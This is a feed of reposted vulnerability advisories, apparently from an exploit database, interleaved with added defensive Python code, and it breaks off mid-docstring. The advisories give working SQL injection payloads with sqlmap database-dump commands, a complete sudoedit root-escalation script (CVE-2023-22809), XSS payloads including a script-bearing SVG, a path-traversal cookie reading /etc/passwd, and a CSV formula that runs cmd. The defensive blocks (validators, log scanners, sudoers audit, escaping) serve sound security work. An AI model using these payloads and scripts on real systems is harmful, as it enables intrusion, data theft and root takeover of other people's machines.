All posts published by ISHACK AI BOT
-
Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23162

# Proof of Concept:
# 1- Install the application Art Gallery Management System Project v1.0.
# 2- Navigate to the product page by clicking "ART TYPE" and selecting any of the categories on the menu.
# 3- Insert a single quote ( ' ) in the "cid" parameter to break the database query; the output is no longer shown.
# 4- Inject two single quotes ('') in the "cid" parameter so the database query is whole again; after sending this request the SQL query executes successfully and the product is shown in the output.
# 5- Find how many columns the SQL query returns; this query returns 6 columns.
#    Payload: cid=1%27order%20by%206%20--%20-&artname=Sculptures
# 6- To extract data from the database manually, use the payload below to see the database user.
#    Payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
# 7- For automation with "SQLMAP", intercept the request and copy it to a file called "request.txt".
# 8- To dump all database data, use the "sqlmap" command below.
#    Command: sqlmap -r request.txt -p cid --dump-all --batch
# Go to this URL: " https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs "
-
Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23163

# Proof of Concept:
# 1- Install the application Art Gallery Management System Project v1.0.
# 2- Navigate to the admin login page and log in with the valid username and password <admin:Test@123>.
#    URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php
# 3- Navigate to "Manage ART TYPE" by clicking the "ART TYPE" option in the left sidebar.
# 4- Click the "Edit" button of any Art Type; you are redirected to the edit page of that art type.
# 5- Insert a single quote ( ' ) in the "editid" parameter to break the database query; the output is no longer shown.
# 6- Inject two single quotes ('') in the "editid" parameter so the database query is whole again; after sending this request the SQL query executes successfully and the product is shown in the output.
# 7- Find how many columns the SQL query returns; this query returns 6 columns.
#    Payload: editid=6%27order%20by%203%20--%20-
# 8- To extract data from the database manually, use the payload below to see the database user.
#    Payload: editid=-6%27union%20all%20select%201,user(),3--%20-
# 9- To dump all database data, use the "sqlmap" command below.
#    Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch
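The two Art Gallery advisories above inject through numeric id parameters (`cid`, `editid`). The following is an added example, not code from the advisories or the vendor: a server-side validator that refuses anything but an unsigned integer before the value reaches a query, and a log scan that flags the advisories' own payloads in access-log lines. The Apache-style log lines are constructed for the example.

```python
"""Added example (not from either advisory): reject non-numeric ids before
they reach a query, and scan web-server access logs for the cid / editid
payloads the two advisories describe. The log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisories name as injectable; both carry numeric ids.
NUMERIC_ID_PARAMS = {"cid", "editid"}

# Tokens that a legitimate numeric id never contains.
SQL_TOKENS = re.compile(
    r"(?:'|\"|--|/\*|\bunion\b|\bselect\b|\border\s+by\b|\buser\s*\(|\bsleep\s*\()",
    re.IGNORECASE,
)

# Request line inside an Apache/nginx combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def is_valid_numeric_id(value: str) -> bool:
    """An unsigned decimal integer of at most 10 digits, nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def validate_numeric_id(value: str) -> int:
    """Server-side fix for the injectable parameter: accept only an unsigned
    decimal integer and hand the cast value (or a bound parameter) to the
    query. A value containing a quote fails here instead of inside SQL."""
    if not is_valid_numeric_id(value):
        raise ValueError(f"invalid id: {value!r}")
    return int(value)


def suspicious_id_params(request_target: str) -> dict:
    """Return {param: decoded value} for numeric-id parameters whose value is
    not a plain integer. parse_qs percent-decodes the values for us."""
    query = urlsplit(request_target).query
    flagged = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name in NUMERIC_ID_PARAMS:
            for value in values:
                if not re.fullmatch(r"[0-9]+", value):
                    flagged[name] = value
    return flagged


def scan_access_log(lines) -> list:
    """Return one finding per request whose id parameter is not an integer,
    noting whether the value also carries SQL tokens."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for param, value in suspicious_id_params(match.group(1)).items():
            findings.append({
                "line": number,
                "param": param,
                "value": value,
                "sql_tokens": bool(SQL_TOKENS.search(value)),
            })
    return findings


# Constructed access log: two clean requests and the three payloads quoted
# in the advisories.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jan/2023:10:00:01 +0000] "GET /Art-Gallery-MS-PHP/product.php?cid=2&artname=Sculptures HTTP/1.1" 200 5120',
    '10.0.0.5 - - [20/Jan/2023:10:00:07 +0000] "GET /Art-Gallery-MS-PHP/product.php?cid=1%27order%20by%206%20--%20-&artname=Sculptures HTTP/1.1" 200 5120',
    '10.0.0.5 - - [20/Jan/2023:10:00:09 +0000] "GET /Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs HTTP/1.1" 200 4980',
    '10.0.0.9 - - [20/Jan/2023:10:01:00 +0000] "GET /Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 HTTP/1.1" 200 3001',
    '10.0.0.9 - - [20/Jan/2023:10:01:04 +0000] "GET /Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=-6%27union%20all%20select%201,user(),3--%20- HTTP/1.1" 200 3001',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The validator is the fix the application needs (together with a prepared statement); the scan is what a defender runs over existing logs to find out whether the payloads were ever tried. Negative ids are flagged on purpose: neither page's ids are ever negative, and `-2` is the first sign of the UNION probe.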
-
sudo 1.8.0 to 1.9.12p1 - Privilege Escalation
```bash
#!/usr/bin/env bash
# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage: https://www.sudo.ws/
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
#
# Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
#
# Running this exploit on a vulnerable system allows a local attacker to gain
# a root shell on the machine.
#
# The exploit checks if the current user has privileges to run sudoedit or
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root
# shell.

if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
    echo "> Currently installed sudo version is not vulnerable"
    exit 1
fi

EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)

if [ -z "$EXPLOITABLE" ]; then
    echo "> It doesn't seem that this user can run sudoedit as root"
    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
    echo "> BINGO! User exploitable"
    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
    echo "$( whoami ) ALL=(ALL:ALL) ALL"
    read -n 1 -s -r -p "Press any key to continue..."
    EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
    sudo su root
    exit 0
fi
```
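The script above gates on two facts: the installed sudo version and whether `sudo -l` shows a sudoedit rule as root. The grep pattern it uses for the version is loose (it also accepts strings such as 1.9.01), so here is an added audit helper, not the exploit author's code, that compares a parsed version against the range the advisory names (1.8.0 through 1.9.12p1) and lists sudoers rules granting sudoedit as root. The sudoers text is constructed for the example; the range bounds come from the advisory's own "Version" line.

```python
"""Added example (not the exploit author's code): audit helper for
CVE-2023-22809 that reports whether a sudo version string falls inside the
range the advisory names (1.8.0 through 1.9.12p1) and which sudoers rules
grant sudoedit as root, the precondition the exploit checks with sudo -l.
The sudoers text below is constructed."""
import re

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")
AFFECTED_LOW = (1, 8, 0, 0)     # first version the advisory lists
AFFECTED_HIGH = (1, 9, 12, 1)   # last version the advisory lists (1.9.12p1)


def parse_sudo_version(text: str) -> tuple:
    """Turn 'Sudo version 1.9.9' or '1.9.12p1' into a comparable tuple
    (major, minor, patch, p-level); versions without a p-level get 0."""
    match = VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no version found in {text!r}")
    major, minor, patch, plevel = match.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected_sudo_version(text: str) -> bool:
    """True when the version lies inside the advisory's affected range."""
    return AFFECTED_LOW <= parse_sudo_version(text) <= AFFECTED_HIGH


# user  host = (runas_user[:runas_group]) [TAG:] command list
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def root_sudoedit_rules(sudoers_text: str) -> list:
    """Return rules that let a user run sudoedit as root (or as ALL, which
    includes root). Comments, Defaults lines and alias definitions are
    skipped; a missing runas list means root, as in sudoers(5)."""
    rules = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        user, host, runas, commands = match.groups()
        runas_user = (runas or "").split(":")[0].strip() or "root"
        if "sudoedit" in commands and runas_user in ("root", "ALL"):
            rules.append({"user": user, "host": host,
                          "runas": runas_user, "commands": commands})
    return rules


# Constructed sample, not any real host's sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
alice   ALL=(root) sudoedit /etc/motd
bob     ALL=(ALL:ALL) ALL
carol   ALL=(www-data) sudoedit /var/www/html/index.html
dave    ALL=(ALL) NOPASSWD: sudoedit /etc/hosts
"""

if __name__ == "__main__":
    print(is_affected_sudo_version("Sudo version 1.9.9"))
    for rule in root_sudoedit_rules(SAMPLE_SUDOERS):
        print(rule)
```

Feed `is_affected_sudo_version` the first line of `sudo --version` and `root_sudoedit_rules` the contents of `/etc/sudoers` and `/etc/sudoers.d/*`; every rule it returns is a user for whom upgrading sudo beyond 1.9.12p1 matters immediately. Rules that grant `ALL` are not listed because such users already have full root and the sudoedit path adds nothing.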
-
SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)
# Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)
# Date: [12/21/2022 02:07:23 AM UTC]
# Exploit Author: [[email protected]]
# Vendor Homepage: [https://www.red-gate.com/]
# Software Link: [https://www.red-gate.com/products/dba/sql-monitor/]
# Version: [SQL Monitor 12.1.31.893]
# Tested on: [Windows OS]
# CVE : [CVE-2022-47870]

[Description]
Cross-site scripting (XSS) in the web SQL Monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web script or HTML via the returnUrl parameter.

[Affected Component]
Affected parameter: returnUrl in https://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True
Affected element: the A tag under the span with id "redirect-timeout"

[CVE Impact]
Disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account.

[Attack Vectors]
To exploit the vulnerability, a user must click the malicious A tag under the span with id "redirect-timeout".

[Vendor]
http://redgate.com
http://sqlmonitor.com
https://sqlmonitor.
-
AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
# Exploit Title: AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
# Date: 17/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: CodeThemes
# Vendor Homepage: https://spondonit.com/
# Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179
# Version: 3.4
# Tested on: Live Demo
# Demo Link : https://amazy.rishfa.com/

# Description #
AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to reflected cross-site scripting because of insufficient sanitization of user-supplied data. Anyone can submit a reflected XSS payload without logging in by searching for a product in the search bar. The application reflects the payload in the frontend search bar, and it fires every time the search history is viewed.

# Proof of Concept (PoC) : Exploit #
1) Go to: https://amazy.rishfa.com/
2) Enter the following payload in the 'Search Item' box: "><script>alert(1)</script>
3) An alert popup with "1" appears
4) The reflected XSS payload has fired

# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB
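Both the SQL Monitor returnUrl issue and the AmazCart search-bar issue above come down to a request value being written into HTML markup unescaped. The following added example (not code from either vendor) shows the two controls a login or search page needs: a strict same-site check for a return URL before it is placed in an `href`, and HTML attribute escaping for any reflected value. The element ids and markup are illustrative, modelled on the "redirect-timeout" span the SQL Monitor advisory names.

```python
"""Added example (not the vendors' code): validate a returnUrl as a
same-site path and escape reflected values before they enter HTML."""
import html
from urllib.parse import urlsplit


def is_safe_return_url(value: str) -> bool:
    """Accept only an absolute path on this site: it must start with a single
    '/', carry no scheme or host (so no 'https://', 'javascript:' or
    protocol-relative '//'), no backslashes and no control characters."""
    if not value or not value.startswith("/") or value.startswith("//"):
        return False
    if "\\" in value or any(ord(ch) < 0x20 for ch in value):
        return False
    parts = urlsplit(value)
    return parts.scheme == "" and parts.netloc == ""


def redirect_link(return_url: str, fallback: str = "/") -> str:
    """Render the post-login redirect anchor. Untrusted targets fall back to
    the site root, and whatever is rendered is attribute-escaped."""
    target = return_url if is_safe_return_url(return_url) else fallback
    return ('<span id="redirect-timeout"><a href="%s">Continue</a></span>'
            % html.escape(target, quote=True))


def reflect_search_term(term: str) -> str:
    """Echo a search term back into the search box without letting it close
    the attribute or the tag; html.escape handles & < > \" and '."""
    return '<input name="q" value="%s">' % html.escape(term, quote=True)


XSS_PROBE = '"><script>alert(1)</script>'   # the AmazCart advisory's payload

if __name__ == "__main__":
    print(redirect_link("/Dashboard"))
    print(redirect_link(XSS_PROBE))
    print(reflect_search_term(XSS_PROBE))
```

Escaping alone would stop the script from running, but validating the return URL is still needed: an unescaped-but-absolute `href` is an open redirect, and the same-site check closes that too.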
-
ManageEngin AMP 4.3.0 - File-path-traversal
## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal
## Author: nu11secur1ty
## Date: 11.22.2023
## Vendor: https://www.manageengine.com/
## Software: https://www.manageengine.com/privileged-session-management/download.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)

## Description:
The `pmpcc` cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. The testing payload `..././..././..././..././..././..././..././..././..././..././etc/passwd` was submitted in the pmpcc cookie, and the requested file was returned in the application's response. An attacker can easily see all the JS structures of the server and can perform very dangerous actions.

## STATUS: HIGH Vulnerability

[+] Exploit:

```http
GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1
Host: localhost:9292
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd; _zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a; JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E; JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Mobile: ?0
X-Requested-With: XMLHttpRequest
Sec-CH-UA-Platform: Windows
Referer: https://localhost:9292/AMPHome.html
```

[+] Response:

```
,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is e-mailed to the user who raises the request, the user who closes the request and also to those e-mail ids specified at the time of closing the request.'
,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username' ,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next synchronization is scheduled to run on' ,'js.agent.csharp_Windows_Agent':'C# Windows Agent' ,'js.PassTrixMainTab.in_sec':'Seconds' ,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or paste the CSR content.' ,'js.connection.colors':'Colors' ,'js.general.ShareToGroups':'Share resource to user groups' ,'js.connection.mapdisk':'Drives' ,'jsp.admin.Support.User_Forums':'User Forums' ,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)' ,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly integrate and perfectly fit into the pre-designed and automated integrations of the below listed RPA-powered platforms, to simulate the routine manual password retrieval from the PAM360 vault.' ,'js.discovery.loadhostnamefromfile':'From file' ,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please enter a valid Implementation Class' ,'js.general.GroupedResources':'Grouped Resources' ,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.' ,'PROCESSID':'Process Id' ,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services fetched successfully' ,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled' ,'js.commonstr.search':'Search' ,'js.discovery.usercredential_type':'Credential Type' ,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check high availability status every <input type=\"text\" class=\"txtbox\" name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\" style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\" > minutes.' ,'pki.js.help.entervalidnumber':'Please enter a valid number for Numeric Field Default Value.' 
,'js.remoteapp.fetch':'Fetch' ,'js.admin.HighAvailability.configured_successfully':'Configured Successfully' ,'js.generalSettings_searchTerm_Password_reset':'Password Reset, Reason for password reset, disable ticket id, waiting time, wait time for service account password reset, linux unix password reset' ,'letsencrypt.enter.domainnames':'Enter domain names' ,'js.discovery.resourcetype':'Resource Type' ,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\'' ,'js.report.timeline.todate':'Valid To' ,'js.general_Language_Changed_Successfully':'Language Changed Successfully' ,'js.aws.credentials.label':'AWS Credential' ,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable purging of audit trails.' ,'js.general.user.orgn_bulkManage':'Manage Organization' ,'js.rolename.SSH_KEY':'Create\/Add key' ,'js.admin.admin.singledbmultiserver.name':'Application Scaling' ,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report' ,'js.settings.breach_settings.disable_api':'Disable API Access' ,'js.cmd.delete.not_possible':'Command cannot be deleted as it is already added to the following command set(s).' ,'js.settings.notification.domaincontent':'Notify if domains are expiring within' ,'js.aws.searchuser':'--Search UserName--' ,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing system settings in Admin >> General >> Ticketing System Integration.' 
,'js.discovery.port':'Gateway Port' ,'usermanagement.showCertificates':'Show Certificates' ,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory cannot be empty' ,'js.sshreport.title':'SSH Resource Report' ,'js.encryptionkey.update':'Update' ,'js.aws.regions':'Region' ,'js.settingsTitle1.UserManagement':'User Management' ,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length' ,'js.commonstr.selectResources':'Select Resources' ,'RULENAME':'Rule Name' ,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User Group added successfully' ,'js.reports.SSHReports.title':'SSH Reports' ,'js.CommonStr.ValueIsLess':'value is less than 2' ,'js.discovery.discoverystatus':'Discovery Status' ,'js.settings.security_settings.Web_Access':'Web Access' ,'js.general.node_name_cannot_be_empty':'Node name cannot be empty' ,'js.deploy.audit':'Deploy Audit' ,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority' ,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate user group(s) to exempt from access control.' ,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)' ,'js.admin.HighAvailability.High_Availability_status':'Status' ,'settings.metracker.note0':'Disable ME Tracker if you do not wish to allow ManageEngine to collect product usage details.' ,'SERVICENAME':'Service Name' ,'settings.metracker.note1':'Access Manager Plus server has to be restarted for the changes to take effect.' ,'js.general.NewPinMismatch':'New PIN Mismatch' ,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'' ,'java.ScheduleUtil.minutes':'minutes' ,'js.admin.sdpop_change.tooltip':'Enabling this option will require your users to provide valid Change IDs for the validation of password access requests and other similar operations. Leaving this option unchecked requires the users to submit valid Request IDs for validation.' 
,'js.privacy_settings.title.redact':'Redact' ,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25 resources can be selected' ,'js.aboutpage.websitetitle':'Website' ,'js.customize.NumericField':'Numeric Field' ,'js.please.select.file':'Please select a file to upload.' ,'js.AutoLogon.Remote_connections':'Remote Connections' ,'pki.snmp.port':'Port' ,'java.dashboardutils.TODAY':'TODAY' ,'js.schedule.starttime':'Start Time' ,'js.ssh.keypassphrase':'Passphrase' ,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus' ,'js.analytics.tab.ueba.msg4':'guide' ,'js.analytics.tab.ueba.msg5':'to complete the integration. For any further questions, please write to us at [email protected].' ,'js.reportType.Option7.UserAuditReport':'Audit Report' ,'js.common.csr':'CSR' ,'js.globalsign.reissue.order':'Reissue Order' ,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior for individual users and entities by mapping different user accounts' ,'js.analytics.tab.ueba.msg7':'Verify actionable reports that symbolize compromise with details about actual behavior and expected behavior.' ,'js.resources.importcredential':'Import Credentials' ,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from different sources, including firewalls, routers, workstations, databases, file servers and cloud services. Any deviation from normal behavior is classified as a time, count, or pattern anomaly. It then gives actionable insight to the IT Administrator with the use of risk scores, anomaly trends, and intuitive reports.' 
,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:' ,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360 instance, download Log360 UEBA from the below link and follow the instructions in this' ,'js.settingsTitle2.MailServer':'Mail Server' ,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing AMP Encryption Key' ,'settings.unmappedmails.email':'E-mail Address' ,'amp.connection.connection_type':'Connection Type' ,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based on activity time, count, and pattern.' ,'godaddy.contactphone':'Contact Phone' ,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already implemented. Implement with some other class.' ,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in Windows devices, SQL servers, FTP servers, and network devices such as routers, firewalls, and switches.' ,'js.rolename.freeCA.acme':'ACME' ,'digicert.label.dcv.cname':'CNAME Token' ,'js.helpcontent.createuser':'User Creation ' ,'pgpkeys.key.details':'Key Information' ,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status' ,'js.HomeTab.TaskAuditView':'Task Audit' ,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups Shared With User Group(s)' ,'js.common.importcsr.format':'(File format should be .csr)' ,'js.notificationpolicy.Submit':'Save' ,'pmp.vct.User_Audit_Configuration':'User Audit Configuration' ... ... ... 
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))

## Reference:
[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)

## Proof and Exploit:
[href](https://streamable.com/scdzsb)

## Time spent
`03:00:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit Data Base https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
-
ERPGo SaaS 3.9 - CSV Injection
# Exploit Title: ERPGo SaaS 3.9 - CSV Injection
# Date: 18/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: RajodiyaInfotech
# Vendor Homepage: https://rajodiya.com/
# Software Link: https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426
# Version: 3.9
# Tested on: Windows & Live Litespeed Web Server
# Demo Link : https://demo.rajodiya.com/erpgo-saas/login

# Description #
ERPGo is a software-as-a-service (SaaS) platform that is vulnerable to CSV injection attacks. This type of attack occurs when an attacker is able to manipulate the data that is imported or exported in a CSV file, in order to execute malicious code or gain unauthorized access to sensitive information. An attacker can exploit this vulnerability by injecting specially crafted data into a CSV file that is then imported into the ERPGo system. This can potentially allow the attacker to gain access to sensitive information, such as login credentials or financial data, or to execute malicious code on the system.

# Proof of Concept (PoC) : Exploit #
1) Go to: https://erpgo.127.0.0.1/ERPGo/register <====| Register a new account
2) Complete the registration
3) Click Accounting System, then Customer
4) Add a new Vendor / click Create
5) Enter this payload in Name: =10+20+cmd|' /C calc'!A0
6) Submit the form
7) Download the vendor list as CSV
8) Open this CSV file in Excel
9) A calculator opens

# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/EkKPZiMa6yz8
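The export step is where the fix belongs: a spreadsheet decides that a cell is a formula from its first character, so an exporter has to neutralise those characters in every user-controlled field. The block below is an added example, not the vendor's code; the vendor rows are constructed and the first name is the payload from the advisory.

```python
"""Added example (not the vendor's code): neutralise spreadsheet formula
triggers when exporting user-controlled fields to CSV, the defence for the
vendor-name injection the advisory demonstrates. Sample rows are constructed."""
import csv
import io

# Characters that make Excel/LibreOffice treat a cell as a formula. Tab and
# carriage return are included because a leading control character followed
# by '=' is still evaluated by some importers.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value) -> str:
    """Prefix a leading apostrophe so the cell is imported as text. Leading
    whitespace is looked past because importers strip it first. Apply this
    to free-text fields only; a genuinely numeric column such as "-5" should
    be exported as a number instead."""
    text = "" if value is None else str(value)
    if text.lstrip()[:1] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_csv(header, rows) -> str:
    """Write rows with every cell quoted (so embedded commas, quotes and
    newlines cannot break the record structure) and every cell neutralised."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buffer.getvalue()


# Constructed vendor records; the first name is the advisory's payload.
SAMPLE_VENDORS = [
    ["=10+20+cmd|' /C calc'!A0", "vendor@example.com"],
    ["Acme Supplies", "sales@example.com"],
    ["-Dash Trading", "dash@example.com"],
]

if __name__ == "__main__":
    print(export_csv(["name", "email"], SAMPLE_VENDORS), end="")
```

The apostrophe is the standard text marker in Excel and LibreOffice; the trade-off is that some importers display it, which is why neutralisation is usually paired with rejecting such values at input time for fields that never legitimately start with those characters.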
-
Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)
# Date: 19/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: ActiveITzone
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: 6.5.0
# Tested on: Live ( Centos & Litespeed Web Server)
# Demo Link : https://demo.activeitzone.com/ecommerce/

# Description #
The Active eCommerce CMS 6.5.0 application has a vulnerability in the profile picture upload feature that allows stored cross-site scripting (XSS) attacks. Specifically, the vulnerability lies in the handling of "svg" image files, which can contain malicious code. An attacker can exploit this vulnerability by uploading a specially crafted "svg" image file as a profile picture, which is then executed by the application when the user views the profile. This can allow the attacker to steal sensitive information, such as login credentials, or to perform other malicious actions on the user's behalf. This vulnerability highlights the importance of proper input validation and image file handling in web application development.

# Exploit Details #
# Vulnerable Path : /aiz-uploader/upload
# Parameter: files (POST)
# Vector:

```xml
<svg version="1.1" baseProfile="full" xmlns=" http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("haha XSS");
</script>
</svg>
```

# Proof of Concept (PoC) : Exploit #
1) Go to: https://localhost
2) Click Registration
3) Log in to your account
4) Go to Manage Profile
5) Upload the vector above as anyname.svg (put the vector code in a file named anyname.svg)
6) After the upload, click to view your profile picture
7) The XSS popup fires

# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv
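An SVG is an XML document, so an upload handler can inspect it before storing or serving it. The following added example (not the vendor's code) parses the file and reports script elements, event-handler attributes and `javascript:`/`data:` links; the first sample document reproduces the advisory's vector, the others are constructed. It uses the standard-library parser to stay dependency-free; the comment notes where `defusedxml` belongs in production.

```python
"""Added example (not the vendor's code): inspect an uploaded SVG before it
is stored or served, rejecting the script element the advisory's vector uses
as well as event-handler attributes and javascript:/data: links. The sample
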